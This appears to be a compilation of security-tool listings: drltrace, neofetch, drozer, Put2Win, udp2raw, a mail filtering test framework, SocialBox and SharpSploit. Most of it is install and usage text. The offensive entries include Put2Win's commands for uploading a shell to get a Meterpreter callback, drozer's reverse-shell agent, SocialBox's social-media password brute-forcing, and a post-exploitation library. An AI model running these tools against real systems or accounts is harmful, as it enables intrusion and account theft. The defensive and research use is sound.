Drltrace – A Library Calls Tracer For Windows & Linux Applications

Drltrace is a dynamic API calls tracer for Windows and Linux applications designed primarily for malware analysis. Drltrace is built on top of DynamoRIO dynamic binary instrumentation framework.

The release build can be downloaded here.

Why Drltrace Rock?

  • Fast enough to perform analysis of malicious samples without being detected by time-based anti-research techniques.
  • Supports both x86 and x64 (ARM in future).
  • Supports both Windows and Linux (macOS in future).
  • Supports self-modifying code.
  • Supports all types of library linkage (static and dynamic).
  • Not-detectable by standard anti-research approaches (anti-hooking, anti-debugging and anti-emulation).
  • User can easily add a new function prototype to tell drltrace how to print more details about previously unknown API calls (even about non-system DLLs). External configuration file is used.
  • Easy-to-use and modify for your own purposes (no additional package requirements, no heavy-weight GUI interface).
  • Open-source, code is clear and well-documented. You can freely build & use your own advanced solution on top of drltrace.

Also ReadSingularity – A DNS Rebinding Attack Framework

Usage

The usage of drltrace is very simple. A user needs to specify a log directory and a name of a target process in the following way:

drltrace -logdir . -- calc.exe

That’s all, the tool will inject required DLLs in the target process, starts instrumentation and in parallel will log information about all library calls which are executed in the target process:

~~43600~~ msvcrt.dll!__wgetmainargs
    arg 0: 0x010d2364
    arg 1: 0x010d2368
    and return to module id:0, offset:0x193a
~~43600~~ ntdll.dll!EtwEventRegister
    arg 0: 0x002ff994
    arg 1: 0x010d1490
    and return to module id:0, offset:0x157e
~~43600~~ ntdll.dll!EtwEventSetInformation
    arg 0: 0x007b4b40
    arg 1: 0x00000033
    and return to module id:0, offset:0x15a1
~~43600~~ SHELL32.dll!ShellExecuteW
    arg 0: <null> (type=<unknown>, size=0x0)
    arg 1: <null> (type=wchar_t*, size=0x0)
    arg 2: calculator:// (type=wchar_t*, size=0x0)
    arg 3: <null> (type=wchar_t*, size=0x0)
    arg 4: <null> (type=wchar_t*, size=0x0)
    arg 5: 0x1 (type=int, size=0x4)
    and return to module id:0, offset:0x167d

The format of the output is simple and can be easily parsed by an external script:

~~[thread id]~~ [dll name]![api call name]
arg [arg #]: [value] (type=[Windows type name], size=[size of arg])
and return to module id:[module unique id], offset:[offset in memory]

The module unique identifiers table is printed at the end of the log file:

Module Table: version 3, count 70
Columns: id, containing_id, start, end, entry, checksum, timestamp, path
  0,   0, 0x010d0000, 0x010da000, 0x010d1b80, 0x0000f752, 0xb5fe3575,  C:\Windows\SysWOW64\calc.exe
  1,   1, 0x6d4c0000, 0x6d621000, 0x6d563940, 0x00136d65, 0x59ce1b0b,  C:\Users\Max\Downloads\drltrace\drltrace\dynamorio\lib32\release\dynamorio.dll
  2,   2, 0x73800000, 0x73975000, 0x7380dbf7, 0x00000000, 0x59ce1b0f,  C:\Users\Max\Downloads\drltrace\drltrace\bin\release/drltracelib.dll
  3,   3, 0x742f0000, 0x742fa000, 0x742f2a00, 0x0000c877, 0x0adc52c1,  C:\Windows\System32\CRYPTBASE.dll
  4,   4, 0x74300000, 0x74320000, 0x7430c9b0, 0x0002c617, 0x245970b4,  C:\Windows\System32\SspiCli.dll
  5,   5, 0x74410000, 0x74431000, 0x74416900, 0x0002a940, 0x88a53c1d,  C:\Windows\System32\GDI32.dll
  6,   6, 0x74440000, 0x74500000, 0x7446fb20, 0x000cc410, 0xd343d532,  C:\Windows\System32\RPCRT4.dll
  7,   7, 0x74500000, 0x74525000, 0x745047d0, 0x00026737, 0xa39c8991,  C:\Windows\System32\IMM32.DLL
  8,   8, 0x74550000, 0x745c7000, 0x7456e8a0, 0x00081857, 0x73b971e1,  C:\Windows\System32\advapi32.dll
  9,   9, 0x748f0000, 0x74929000, 0x748febd0, 0x00045303, 0xa58be652,  C:\Windows\System32\cfgmgr32.dll
 10,  10, 0x74930000, 0x75c78000, 0x74aa09d0, 0x01377aa6, 0x4b39926b,  C:\Windows\System32\SHELL32.dll

Drltrace can easily filter out interlibrary calls and print only API calls performed from the main module (or from a heap) of a target application by specifying -only_from_app option which is very useful in case of applications that generate huge logs. Drltrace also has several useful external scripts to filter API calls for certain library, print only potentially interesting API calls and strings.

Command line options

 -logdir              [     .]  Log directory to print library call data
 -only_from_app       [ false]  Reports only library calls from the app
 -follow_children     [  true]  Trace child processes
 -print_ret_addr      [ false]  Print library call's return address
 -num_unknown_args    [     2]  Number of unknown libcall args to print
 -num_max_args        [     6]  Maximum number of arguments to print
 -default_config      [  true]  Use default config file.
 -config              [    ""]  The path to custom config file.
 -ignore_underscore   [ false]  Ignores library routine names starting with "_".
 -only_to_lib         [    ""]  Only reports calls to the library <lib_name>.
 -help                [ false]  Print this message.
 -version             [ false]  Print version number.
 -verbose             [     1]  Change verbosity.
 -use_config          [  true]  Use config file

Configuration file syntax

Drltrace supports external configuration files where a user can describe how drltrace should print arguments for certain API calls.

HANDLE|CreateRemoteThread|HANDLE|SECURITY_ATTRIBUTES*|size_t|THREAD_START_ROUTINE*|VOID*|DWORD|__out DWORD*

Each function argument should be separated by |. The first argument is return type, the second argument is a function name itself and the rest are the function arguments. A token __out is used to mark output arguments and ___inout is used to mark input+output arguments.

Log Visualization

To make the work with log files easier, we have implemented a script called api_calls_viz.py which can be used to generate RGB images where each pixel color represents unique API call. For example, the picture below represents log file of WannaCry malware.

The large green areas on the picture represent API calls (wcscmp/wcsicmp) which are used to select files with interesting extensions (e.g. docx, xls, py) to encrypt them. The purple areas represent API calls (FindFirstFile/FindNextFile/CryptEncrypt) which are used to enumerate and encrypt files and folders on the disk.

The script can also generate an HTML representation of generated RGB image where each element can be selected to show a name of API call.

Neofetch – A command-line System Information Tool

Neofetch is a command-line system information tool written in bash 3.2+. Neofetch displays information about your operating system, software and hardware in an aesthetic and visually pleasing way.

The overall purpose of Neofetch is to be used in screen-shots of your system. Neofetch shows the information other people want to see. There are other tools available for proper system statistic/diagnostics.

The information by default is displayed alongside your operating system’s logo. You can further configure Neofetch to instead use an image, a custom ASCII file, your wallpaper or nothing at all.

You can further configure Neofetch to display exactly what you want it to. Through the use of command-line flags and the configuration file you can change existing information outputs or add your own custom ones.

Neofetch supports almost 150 different operating systems. From Linux to Windows, all the way to more obscure operating systems like Minix, AIX and Haiku. If your favourite operating system is unsupported: Open up an issue and support will be added.

Also ReadMail Security Testing – Framework For Mail Security & Filtering Solutions

Neofetch Installation

Latest Release

  1. Download the latest release.
  2. Run make install inside the script directory to install the script.
    • El Capitan: make PREFIX=/usr/local install
    • Haiku: make PREFIX=/boot/home/config/non-packaged install
    • OpenIndiana: gmake install
    • MinGW/MSys: make -i install
    • NOTE: You may have to run this as root.

Latest Git Master (Bleeding Edge)

  1. Git clone the repo.
    • git clone https://github.com/dylanaraps/neofetch
  2. Change working directory to neofetch.
    • cd neofetch
  3. Install neofetch using the Makefile.
    • make install
    • El Capitan: make PREFIX=/usr/local install
    • Haiku: make PREFIX=/boot/home/config/non-packaged install
    • OpenIndiana: gmake install
    • MinGW/MSys: make -i install
    • NOTE: You may have to run this as root.

NOTE: Neofetch can be uninstalled easily using make uninstall. This removes all of files from your system.

NOTE: You can run neofetch from any folder on your system, all the makefile does is move the files to a “sane” location. The Makefile is optional.

OS/Distro Packages

This section lists neofetch packages that have been made for specific OS/Distros.

Alpine Linux

Alpine Linux v3.8 and up

  1. Update repositories
    • apk update
  2. Install the package
    • apk add neofetch

Android (Termux)

Neofetch is in Termux’s default repos.

  1. Update repositories
    • sudo apt-get update
  2. Install the package
    • sudo apt-get install neofetch

Arch

Neofetch is available in the official repos.

  • Install the package
    • pacman -S neofetch

BunsenLabs

Neofetch is available in the official repos.

  1. Update repositories
    • sudo apt-get update
  2. Install the package
    • sudo apt-get install neofetch

CRUX

  1. Install git and the git ports(8) driver
    • sudo prt-get depinst git
  2. Add the 6c36-git repository
    • sudo wget -O /etc/ports/6c37-git.git "https://raw.githubusercontent.com/6c37/cross/master/git-driver/6c37-git.git"
  3. Sync the repos
    • sudo ports -u
  4. Add the repo to /etc/prt-get.conf with your text editor of choice
    • prtdir /usr/ports/6c37-git
  5. Install the package
    • sudo prt-get depinst neofetch

Or alternatively use the port:

  1. Download port
    • wget -O ~/work/neofetch/Pkgfile "https://raw.githubusercontent.com/6c37/crux-ports-git/3.2/neofetch/Pkgfile"
  2. Build the package
    • fakeroot pkgmk -d
  3. Install the package
    • sudo pkgadd neofetch#git-*.pkg.tar.gz

Debian

Stretch / Sid (Unstable)

Neofetch is in Debian Stretch/Sid’s official repositories.

  1. Update repositories
    • sudo apt-get update
  2. Install the package
    • sudo apt-get install neofetch

NOTE: Debian stretch repo only contains version 2.0.2.

NOTE2: The third party bintray repo has been deprecated, if you want to stay up to date with neofetch on Debian stable, then you need to manually install newer packages from unstable or download neofetch directly from git repository since it’s contained in single file.

Fedora / RHEL / CentOS / Mageia

NOTE: If you are using RHEL/CentOS, change dnf into yum.

  1. Make sure you have installed dnf-plugins-core
  2. Enable COPR repository
    • sudo dnf copr enable konimex/neofetch
  3. Install the package
    • sudo dnf install neofetch

Alternatively:

  1. If you’re using RHEL/CentOS, make sure you have installed epel-release
  2. Fetch the repo file
  • curl -o /etc/yum.repos.d/konimex-neofetch-epel-7.repo
    https://copr.fedorainfracloud.org/coprs/konimex/neofetch/repo/epel-7/konimex-neofetch-epel-7.repo

    • NOTE: If you are using Fedora, change epel-7 to fedora-23 or your Fedora version respectively. However if you are using RHEL/CentOS 6, change it to epel-6.
  1. Install the package
    • sudo dnf install neofetch

Gentoo / Funtoo

You can install app-misc/neofetch from Gentoo/Funtoo’s official repositories.

To install the git version of neofetch, use =app-misc/neofetch-9999 instead.

GoboLinux

Install it with the official recipe.

  • sudo Compile neofetch

iOS

  1. Add http://dylanaraps.com/repo to your cydia sources.
  2. Install neofetch through cydia.

macOS (Homebrew)

  1. Install neofetch with Homebrew
    • brew install neofetch

NixOS

Install it from the official repositories

  • sudo nix-env -i neofetch

Slackware

Download the files from SlackBuilds and follow their instructions.

Solus

You can find neofetch in software center under System Software > System Utilities or type sudo eopkg it neofetch.

Ubuntu

Ubuntu 17.04 and up

Install it from the official repositories.

  1. Update repositories
    • sudo apt update
  2. Install the package
    • sudo apt install neofetch

Ubuntu 16.10 and below

  1. Add PPA
    • sudo add-apt-repository ppa:dawidd0811/neofetch
  2. Update repositories
    • sudo apt update
  3. Install the package
    • sudo apt install neofetch

Ubuntu daily builds

This PPA contains daily builds of neofetch straight from master branch

  1. Add PPA
    • sudo add-apt-repository ppa:dawidd0811/neofetch-daily
  2. Update repositories
    • sudo apt update
  3. Install the package
    • sudo apt install neofetch

Void Linux

Install it from the official repositories

  • sudo xbps-install -S neofetch

Drozer v2.4.4 – The Leading Security Assessment Framework For Android

Drozer 2.4.4  is the leading security testing framework for Android. Drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps’ IPC endpoints and the underlying OS.

Drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (MWR’s advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

Drozer 2.4.4 Installation

Building Python wheel

git clone https://github.com/mwrlabs/drozer/
cd drozer
python setup.py bdist_wheel

Installing Python wheel

sudo pip install drozer-2.x.x-py2-none-any.whl

Building for Debian/Ubuntu/Mint

git clone https://github.com/mwrlabs/drozer/
cd drozer
make deb

Installing .deb (Debian/Ubuntu/Mint)

sudo dpkg -i drozer-2.x.x.deb

Building for Redhat/Fedora/CentOS

git clone https://github.com/mwrlabs/drozer/
cd drozer
make rpm

Installing .rpm (Redhat/Fedora/CentOS)

sudo rpm -I drozer-2.x.x-1.noarch.rpm

Building for Windows

NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn’t be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

git clone https://github.com/mwrlabs/drozer/
cd drozer
python.exe setup.py bdist_msi

Installing .msi (Windows)

Run dist/drozer-2.x.x.win-x.msi

Arch Linux

yaourt -S drozer

Also ReadExploit CVE-2017-6079 – Blind Command Injection In Edgewater Edgemarc Devices Exploit

Drozer 2.4.4 Usage

Installing the Agent

Drozer can be installed using Android Debug Bridge (adb).

Download the latest Drozer Agent here.

$ adb install drozer-agent-2.x.x.apk

Starting a Session

You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you’re ready to start exploring.

We will use the server embedded in the drozer Agent to do this.

If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:

$ adb forward tcp:31415 tcp:31415

Now, launch the Agent, select the “Embedded Server” option and tap “Enable” to start the server. You should see a notification that the server has started.

Then, on your PC, connect using the drozer Console:

On Linux:

$ drozer console connect

On Windows:

> drozer.bat console connect

If using a real device, the IP address of the device on the network must be specified:

On Linux:

$ drozer console connect --server 192.168.0.10

On Windows:

> drozer.bat console connect --server 192.168.0.10

You should be presented with a drozer command prompt:

selecting f75640f67144d9a3 (unknown sdk 4.1.1)  
dz>

The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.

You are now ready to start exploring the device.

Command Reference

Command Description
run Executes a drozer module
list Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
shell Start an interactive Linux shell on the device, in the context of the Agent process.
cd Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module.
clean Remove temporary files stored by drozer on the Android device.
contributors Displays a list of people who have contributed to the drozer framework and modules in use on your system.
echo Print text to the console.
exit Terminate the drozer session.
help Display help about a particular command or module.
load Load a file containing drozer commands, and execute them in sequence.
module Find and install additional drozer modules from the Internet.
permissions Display a list of the permissions granted to the drozer Agent.
set Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
unset Remove a named variable that drozer passes to any Linux shells that it spawns.

Put2Win – Script To Automatize Shell Upload By PUT HTTP Method To Get Meterpreter

Put2Win is a script to automatize shell upload by PUT HTTP method to get meterpreter. It’s necessary to have installed nmap and msfvenom tools for a correct operation.

Also ReadJoomscan – OWASP Joomla Vulnerability Scanner Project

Put2Win Usage

./Put2win.sh -h

This script automatize shell upload by PUT HTTP method to get meterpreter.

Usage: ./Put2win.sh -t TARGET [-p PORT] -u URL_PATH -l LHOST

Examples:

./Put2win.sh -t 192.168.1.80 -u /uploads -l 192.168.1.10
./Put2win.sh -t 192.168.1.80 -p 443 -u /uploads -l 192.168.1.10

Credit: @devploit

UDP2Raw Tunnel – A Tunnel which Turns UDP Traffic into Encrypted UDP/FakeTCP/ICMP

Udp2raw Tunnel is a tunnel which turns UDP Traffic into Encrypted FakeTCP/UDP/ICMP Traffic by using Raw Socket, helps you Bypass UDP FireWalls(or Unstable UDP Environment). It can defend Replay-Attack and supports Multiplexing. It also acts as a Connection Stabilizer.

When used alone,udp2raw tunnels only UDP traffic. Nevertheless,if you used udp2raw + any UDP-based VPN together,you can tunnel any traffic(include TCP/UDP/ICMP),currently OpenVPN/L2TP/ShadowVPN and tinyfecVPN are confirmed to be supported.

Also ReadSharpSploit – A .NET Post-Exploitation Library Written in C#

Udp2raw Tunnel Features

Send/Receive UDP Packets with ICMP/FakeTCP/UDP headers

ICMP/FakeTCP headers help you bypass UDP blocking, UDP QOS or improper UDP NAT behavior on some ISPs. In ICMP header mode,udp2raw tunnel works like an ICMP tunnel.

UDP headers are also supported. In UDP header mode, it behaves just like a normal UDP tunnel, and you can just make use of the other features (such as encrytion, anti-replay, or connection stalization).

Simulated TCP with Real-time/Out-of-Order Delivery

In FakeTCP header mode,udp2raw tunnel simulates 3-way handshake while establishing a connection,simulates seq and ack_seq while data transferring. It also simulates following TCP options: MSS, sackOk, TS, TS_ack, wscale.Firewalls will regard FakeTCP as a TCP connection, but its essentially UDP: it supports real-time/out-of-order delivery(just as normal UDP does), no congrestion control or re-transmission. So there wont be any TCP over TCP problem when using OpenVPN.

Encryption, Anti-Replay

  • Encrypt your traffic with AES-128-CBC.
  • Protect data integrity by HMAC-SHA1 (or weaker MD5/CRC32).
  • Defense replay attack with an anti-replay window, smiliar to IPSec and OpenVPN.

Failure Detection & Stabilization (Connection Recovery)

Conection failures are detected by heartbeats. If timed-out, client will automatically change port number and reconnect. If reconnection is successful, the previous connection will be recovered, and all existing UDP conversations will stay vaild.

For example, if you use udp2raw + OpenVPN, OpenVPN won’t lose connection after any reconnect, even if network cable is re-plugged or WiFi access point is changed.

Other Features

  • Multiplexing One client can handle multiple UDP connections, all of which share the same raw connection.
  • Multiple Clients One server can have multiple clients.
  • NAT Support All of the 3 modes work in NAT environments.
  • OpenVZ Support Tested on BandwagonHost VPS.
  • Easy to Build No dependencies.To cross-compile udp2raw tunnel, all you need to do is just to download a toolchain,modify makefile to point at the toolchain,run make cross then everything is done.(Note:Pre-compiled binaries for Desktop,RaspberryPi,Android,some Openwrt Routers are already included in Releases)

Keywords

Bypass UDP QoS Bypass UDP Blocking Bypass OpenVPN TCP over TCP problem OpenVPN over ICMP UDP to ICMP tunnel UDP to TCP tunnel UDP over ICMP UDP over TCP

Getting Started

Running

Assume your UDP is blocked or being QOS-ed or just poorly supported. Assume your server ip is 44.55.66.77, you have a service listening on udp port 7777.

# Run at server side:
./udp2raw_amd64 -s -l0.0.0.0:4096 -r 127.0.0.1:7777    -k "passwd" --raw-mode faketcp -a

# Run at client side
./udp2raw_amd64 -c -l0.0.0.0:3333  -r44.55.66.77:4096  -k "passwd" --raw-mode faketcp -a

(The above commands need to be run as root. For better security, with some extra steps, you can run udp2raw tunnel as non-root)

Server Output:

Client Output:

Now,an encrypted raw tunnel has been established between client and server through TCP port 4096. Connecting to UDP port 3333 at the client side is equivalent to connecting to port 7777 at the server side. No UDP traffic will be exposed.

Advanced Topic

Usage

udp2raw tunnel
git version:6e1df4b39f    build date:Oct 24 2017 09:21:15
repository: https://github.com/wangyu-/udp2raw-tunnel

usage:
    run as client : ./this_program -c -l local_listen_ip:local_port -r server_address:server_port  [options]
    run as server : ./this_program -s -l server_listen_ip:server_port -r remote_address:remote_port  [options]

common options,these options must be same on both side:
    --raw-mode            <string>        avaliable values:faketcp(default),udp,icmp
    -k,--key              <string>        password to gen symetric key,default:"secret key"
    --cipher-mode         <string>        avaliable values:aes128cbc(default),xor,none
    --auth-mode           <string>        avaliable values:hmac_sha1,md5(default),crc32,simple,none
    -a,--auto-rule                        auto add (and delete) iptables rule
    -g,--gen-rule                         generate iptables rule then exit,so that you can copy and
                                          add it manually.overrides -a
    --disable-anti-replay                 disable anti-replay,not suggested
client options:
    --source-ip           <ip>            force source-ip for raw socket
    --source-port         <port>          force source-port for raw socket,tcp/udp only
                                          this option disables port changing while re-connecting
other options:
    --conf-file           <string>        read options from a configuration file instead of command line.
                                          check example.conf in repo for format
    --fifo                <string>        use a fifo(named pipe) for sending commands to the running program,
                                          check readme.md in repository for supported commands.
    --log-level           <number>        0:never    1:fatal   2:error   3:warn
                                          4:info (default)     5:debug   6:trace
    --log-position                        enable file name,function name,line number in log
    --disable-color                       disable log color
    --disable-bpf                         disable the kernel space filter,most time its not necessary
                                          unless you suspect there is a bug
    --sock-buf            <number>        buf size for socket,>=10 and <=10240,unit:kbyte,default:1024
    --force-sock-buf                      bypass system limitation while setting sock-buf
    --seq-mode            <number>        seq increase mode for faketcp:
                                          0:static header,do not increase seq and ack_seq
                                          1:increase seq for every packet,simply ack last seq
                                          2:increase seq randomly, about every 3 packets,simply ack last seq
                                          3:simulate an almost real seq/ack procedure(default)
                                          4:similiar to 3,but do not consider TCP Option Window_Scale,
                                          maybe useful when firewall doesnt support TCP Option
    --lower-level         <string>        send packets at OSI level 2, format:'if_name#dest_mac_adress'
                                          ie:'eth0#00:23:45:67:89:b9'.or try '--lower-level auto' to obtain
                                          the parameter automatically,specify it manually if 'auto' failed
    --gen-add                             generate iptables rule and add it permanently,then exit.overrides -g
    --keep-rule                           monitor iptables and auto re-add if necessary.implys -a
    --clear                               clear any iptables rules added by this program.overrides everything
    -h,--help                             print this help message

Iptables rules,-a and -g

This program sends packets via raw socket. In FakeTCP mode, Linux kernel TCP packet processing has to be blocked by a iptables rule on both sides, otherwise the kernel will automatically send RST for an unrecongized TCP packet and you will sustain from stability / peformance problems. You can use -a option to let the program automatically add / delete iptables rule on start / exit. You can also use the -g option to generate iptables rule and add it manually.

--cipher-mode and --auth-mode

It is suggested to use aes128cbc + hmac_sha1 to obtain maximum security. If you want to run the program on a router, you can try xor + simple, which can fool packet inspection by firewalls the most of time, but it cannot protect you from serious attacks. Mode none is only for debugging purpose. It is not recommended to set the cipher-mode or auth-mode to none.

--seq-mode

The FakeTCP mode does not behave 100% like a real tcp connection. ISPs may be able to distinguish the simulated tcp traffic from the real TCP traffic (though it’s costly). seq-mode can help you change the seq increase behavior slightly. If you experience connection problems, try to change the value.

--lower-level

--lower-level allows you to send packet at OSI level 2(link level),so that you can bypass any local iptables rules. If you have a complicated iptables rules which conflicts with udp2raw tunnel and you cant(or too lazy to) edit the iptables rules,--lower-level can be very useful. Try --lower-level auto to auto detect the parameters,you can specify it manually if auto fails.

Manual format if_name#dest_mac_adress,ie:eth0#00:23:45:67:89:b9.

--keep-rule

Monitor iptables and auto re-add iptables rules(for blocking kernel tcp processing) if necessary.Especially useful when iptables rules may be cleared by other programs(for example,if you are using openwrt,everytime you changed and commited a setting,iptables rule may be cleared and re-constructed).

--conf-file

You can also load options from a configuration file in order to keep secrets away from ps command.

For example, rewrite the options for the above server example (in Getting Started section) into configuration file:

server.conf

-s
# You can add comments like this
# Comments MUST occupy an entire line
# Or they will not work as expected
# Listen address
-l 0.0.0.0:4096
# Remote address
-r 127.0.0.1:7777
-a
-k passwd
--raw-mode faketcp

Pay attention to the -k parameter: In command line mode the quotes around the password will be removed by shell. In configuration files we do not remove quotes.

Then start the server with

./udp2raw_amd64 --conf-file server.conf

--fifo

Use a fifo(named pipe) for sending commands to the running program. For example --fifo fifo.file.

At client side,you can use echo reconnect >fifo.file to force client to reconnect.Currently no command has been implemented for server.

Performance Test

Test method:

iperf3 TCP via OpenVPN + udp2raw (iperf3 UDP mode is not used because of a bug mentioned in this issue: https://github.com/esnet/iperf/issues/296 . Instead, we package the TCP traffic into UDP by OpenVPN to test the performance. Read Application for details.

iperf3 command:

iperf3 -c 10.222.2.1 -P40 
iperf3 -c 10.222.2.1 -P40 -R

Environments

  • Client Vultr $2.5/monthly plan (single core 2.4GHz cpu, 512MB RAM, Tokyo, Japan)
  • Server BandwagonHost $3.99/annually plan (single core 2.0GHz cpu, 128MB RAM, Los Angeles, USA)

Test1

raw_mode: faketcp cipher_mode: xor  auth_mode: simple

(reverse speed was simliar and not uploaded)

Test2

raw_mode: faketcp cipher_mode: aes128cbc  auth_mode: md5

(reverse speed was simliar and not uploaded)

Application

Tunneling any traffic via raw traffic by using udp2raw +openvpn

  1. Bypasses UDP block/UDP QOS
  2. No TCP over TCP problem (TCP over TCP problem http://sites.inka.de/bigred/devel/tcp-tcp.html ,https://community.openvpn.net/openvpn/ticket/2 )
  3. OpenVpn over ICMP also becomes a choice
  4. Supports almost any UDP-based VPN

Mail Security Testing – Framework For Mail Security & Filtering Solutions

Mail Security Testing Framework is a testing framework for mail security and filtering solutions.

Mail Security Testing Installation

The mail security testing framework works with with Python >=3.5. Just pull this repository and go ahead. No further dependencies are required.

Usage

The script mail-tester.py runs the tests. Read the help message with ./mail-tester.py --help and check the list of test and evasion modules with ./mail-tester.py -l to get an overview about the capabilities and the usage of the script. Some hints:

  • At least the parameters --smtp-server and --to should be given for a minimal test run.
  • All parameters can also be stored in configuration files without the prefix --. These configuration files can be used by invoking ./mail-tester.py @tester.conf (configuration contained in tester.conf).
  • Multiple recipients can be configured with --to for testing of different filter configurations.
  • Some mail filtering solutions may reject messages after a while. Use --auto-delay for automatic throttling of the mails. This can be fine-tuned with --delay-step, --delay-max and --delay.
  • Some tests (Spam and Malware) require samples. Put these in directories and configure these directories with --spam-folder and --malware-folder parameters. The samples are not included in this repository (and will not be). Good places to get malware are theZoo, Das Malwerk or other collections. Spam can be exported straight from yout Spam folder, but must be in EML format.
  • Blacklists can be supplied with the --blacklist parameter and are used as sender addresses.
  • The Shellshock and subject XSS test cases should have a valid backconnect domain, where you are able to see any backconnects (especially DNS requests). The free Canary Tokens service can be used for this purpose. Thanks to Thinkst for providing this awesome service!
  • Some neat attachment recognition evasion tricks can be enabled with --evasion content-disposition. These were used in the past to confuse AV/sandboxing solutions and let them pass malicious mails.
  • Don’t forget to log the test results with --log. Mail filtering providers often reject mails in the SMTP dialog, which is reflected in the generated log.
  • Test cases can be dumped with --output as plain files in a directory, in MBox (--mbox) or MailDir (--maildir) format. This is useful to test mail user agents without sending any mails, to document or review generated test cases.

Also ReadSocialBox – A Bruteforce Attack Framework[ Facebook , Gmail , Instagram ,Twitter]

Development  & Extension For Mail Security Testing

Tests

Own tests can be implemented with a class in one of the iexisting or newly created Python files in the tests/ directory. The class must be a subclass of MailTestBase located in the module tests.base of this project. Newly implemented tests are discovered automatically when the class variable active is set to True. Further (if you plan to contribute tests back to the main repository), the class variables identifier, name and description should be set appropriately.

The following base classes exist with methods or class variables intended for overriding:

  • MailTestBase: Test class for generic tests.
    • generateTestCases(): Yields test messages. These should be generated with the MIME* classes from the Python email.mime.* packages or with the Message class from email.message to ensure valid mail messages.
    • active: Boolean value if test should be active.
    • identifier: Short identifier of the test. This one is used to enable or disable tests in parameters.
    • name: Short test title.
    • description: Longer test description, should fit within approximately 100 characters.
    • delivery_sender and delivery_recipient: Boolean values, False by default. Normally, the sender and recipients are set in the message and the Python SMTP module takes them over from there. Sometimes it is desirable to set them explicitely in the SMTP library, which can be configured by setting this values to True.
    • finalizeMessage(msg): By default, the base test class sets the From and To headers accordingly. This behaviour can be overridden if required for the test case.
  • MailAttachmentTestBase: Test class for attachment test cases. This generates a complete valid mail with a Subject and a text part and attaches the test case to it. Derived from MailTestBase, therefore the methods/variables from it can be overridden here, too.
    • generateAttachments(): Yields test cases as (description, attachment) tuples.
    • subject: Sets the subject. The place holder {} is replaced by the description yielded by generateAttachments().
    • generateTestCases(): is already overridden with an implementation of the message generation described above, but may be further adapted if required.

Setting the subjects of generated messages is highly recommended to be able to recongize the tests in the receiving inbox.

Evasions

Evasion classes implement techniques for evading recognition of particular mail properties by mail security solutions. Currently, a evasion technique that tries to hide attachments from such solutions by intentionally broken Content-Disposition headers is implemented.

Implement New Evasions

Evasions are implemented by a factory class pattern. The DeliveryBase class instantiaties a factory class derived from the BaseEvasionFactory class. The factory constructor receives a flag that indicates if the evasion is activated. The evasion factory instance is then passed to the test class and stored in its evasions attribute that contains a dict with the evasion identifiers as keys. Inside the test, a evasion class (based on EvasionBase) is instantiated with getEvasionGenerator(). The constructor parameter are defined individually per evasion technique.

The following base classes are used to implement evasions:

  • BaseEvasionFactory: Evasion factories must be based on this class. Usually, only the following class variables should be set:
    • active: Set to True if the evasion should be active.
    • identifier: Short identifier of the evasion module used for enabling it in the test configuration.
    • name: Short title of the evasion technique.
    • description: Longer description of the evasion technique. Should fit in approximately 100 characters.
    • generator_evasion: Evasion class that is instantiated if the evasion is enabled.
    • generator_default: Evasion class that is instantiated if the evasion is disabled.
  • BaseEvasion: Implementation of evasions must be a subclass of this base class. The following method must be overridden:
    • __init__(): Should instantiate the class with the base message or attachment that should be manipulated with evasion techniques.
    • generate(): Apply the evasion technique to the object passed to the constructor and yield it to the caller as (description, object with evasion applied) tuple.

Generally, the evasion class should yield all evasion variants and pass the default as dedicated test case, while the default evasion classes only pass the given object or create the required data structures, like headers.

Using Evasion Techniques in Test Cases

Evasion techniques are used in test cases where they are applicable. E.g. if an evasion technique manipulates the header of a mail or attachment, the following steps have to be implemented:

  1. Generate the base object (mail or attachment) without consideration of the evasion.
  2. Instantiate the appropriate evasion class by utilization of the evasion factory instance from self.evasions, e.g.: evasion_items = self.evasions["evasion_identifier"].getEvasionGenerator(message)
  3. Iterate over the generator and yield the test cases:
for evasion_item in evasion_items:
    yield evasion_item

Usage of the Content Disposition Evasion Technique

The content disposition evasion technique is already implemented in the framework and should be used for all test cases that target on the recognition of malicious attachments. The constructor receives an attachment and the intended file name. The evasion class then yields (evasion name, attachment with applied evasion technique) tuples that can directly be yielded by the tests generateAttachments() method.

Disclaimer

Don’t do anything evil with this! Tests of cloud or otherwise hosted solutions should always be approved by the tested provider. Only use your own test accounts and don’t annoy anyone with a load of test mails.

SocialBox – A Bruteforce Attack Framework[ Facebook , Gmail , Instagram ,Twitter]

SocialBox is a Bruteforce Attack Framework [ Facebook , Gmail , Instagram ,Twitter ].

SocialBox Installation

sudo apt-get install git
sudo git clone https://github.com/TunisianEagles/SocialBox.git
cd SocialBox
chmod +x SocialBox.sh
chmod +x install-sb.sh
./install-sb.sh
./SocialBox.sh

Tested On

  • Backbox linux
  • Ubuntu
  • Kali linux

Also ReadDVR-Exploiter : DVR-Exploiter a Bash Script Program Exploit The DVR’s

Screenshots

Credit: Belahsan Ouerghi

SharpSploit – A .NET Post-Exploitation Library Written in C#

SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.

It is named, in part, as a homage to the PowerSploit project, a personal favorite of mine! While SharpSploit does port over some functionality from PowerSploit, my intention is not at all to create a direct port of PowerSploit. It will be it’s own project, albeit with similar goals to PowerSploit.

Also ReadVboxdie Cracker – Virtual Box Disk Image Encryption Password Cracker

SharpSploit Appeal of C#

There seems to be a trend developing on the offensive side of the security community in porting existing PowerShell toolsets to C#. And SharpSploit is another piece to that puzzle. With the added security features in PowerShell (ie. ScriptBlock Logging, AMSI, etc.), it makes sense that red teamers are investing in other options. And C# is the logical next step from PowerShell, seeing that they both are based on the .NET framework and porting toolsets from PowerShell to C# is fairly easy to do.

